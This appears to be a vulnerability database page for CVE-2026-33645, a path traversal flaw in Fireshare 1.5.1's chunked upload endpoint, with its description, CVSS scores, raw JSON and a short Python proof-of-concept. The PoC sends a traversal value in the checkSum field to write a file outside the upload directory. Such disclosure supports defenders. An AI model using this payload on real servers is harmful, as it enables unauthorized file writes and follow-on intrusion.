Security Vulnerability Report
中文
CVE-2026-33645 CVSS 7.1 HIGH

CVE-2026-33645

Published: 2026-03-26 21:17:08
Last Modified: 2026-03-30 18:12:02
Source: [email protected]

Description

Fireshare facilitates self-hosted media and link sharing. In version 1.5.1, an authenticated path traversal vulnerability in Fireshare’s chunked upload endpoint allows an attacker to write arbitrary files outside the intended upload directory. The `checkSum` multipart field is used directly in filesystem path construction without sanitization or containment checks. This enables unauthorized file writes to attacker-chosen paths writable by the Fireshare process (e.g., container `/tmp`), violating integrity and potentially enabling follow-on attacks depending on deployment. Version 1.5.2 fixes the issue.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L

Configurations (Affected Products)

cpe:2.3:a:shaneisrael:fireshare:1.5.1:*:*:*:*:*:*:* - VULNERABLE
Fireshare <= 1.5.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests # Target configuration target_url = "http://localhost:5000/api/upload/chunk" # Example endpoint auth_token = "VALID_LOW_PRIVILEGE_TOKEN_OR_COOKIE" # Requires authentication # The vulnerable endpoint expects a multipart upload # The 'checkSum' field is directly used in path construction without sanitization files = { # File content to be written 'file': ('payload.txt', b'Malicious content or webshell', 'text/plain'), # The vulnerable field: using path traversal to escape the upload directory 'checkSum': (None, '../../../tmp/payload.txt') } headers = { "Authorization": f"Bearer {auth_token}" } try: response = requests.post(target_url, headers=headers, files=files) if response.status_code == 200: print("[+] PoC executed successfully. File likely written outside intended directory.") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[!] Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33645", "sourceIdentifier": "[email protected]", "published": "2026-03-26T21:17:07.940", "lastModified": "2026-03-30T18:12:01.663", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Fireshare facilitates self-hosted media and link sharing. In version 1.5.1, an authenticated path traversal vulnerability in Fireshare’s chunked upload endpoint allows an attacker to write arbitrary files outside the intended upload directory. The `checkSum` multipart field is used directly in filesystem path construction without sanitization or containment checks. This enables unauthorized file writes to attacker-chosen paths writable by the Fireshare process (e.g., container `/tmp`), violating integrity and potentially enabling follow-on attacks depending on deployment. Version 1.5.2 fixes the issue."}, {"lang": "es", "value": "Fireshare facilita el intercambio de medios y enlaces autoalojados. En la versión 1.5.1, una vulnerabilidad de salto de ruta autenticado en el endpoint de carga por fragmentos de Fireshare permite a un atacante escribir archivos arbitrarios fuera del directorio de carga previsto. El campo multipart 'checkSum' se utiliza directamente en la construcción de rutas del sistema de archivos sin saneamiento ni comprobaciones de contención. Esto permite escrituras de archivos no autorizadas en rutas elegidas por el atacante que son escribibles por el proceso de Fireshare (por ejemplo, el contenedor '/tmp'), violando la integridad y potencialmente habilitando ataques posteriores dependiendo del despliegue. La versión 1.5.2 corrige el problema."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 4.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}, {"lang": "en", "value": "CWE-73"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:shaneisrael:fireshare:1.5.1:*:*:*:*:*:*:*", "matchCriteriaId": "30F3F40C-460E-4042-8663-36E9994D325C"}]}]}], "references": [{"url": "https://github.com/ShaneIsrael/fireshare/releases/tag/v1.5.2", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/ShaneIsrael/fireshare/security/advisories/GHSA-7q8r-vpq3-89m7", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/ShaneIsrael/fireshare/security/advisories/GHSA-7q8r-vpq3-89m7", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.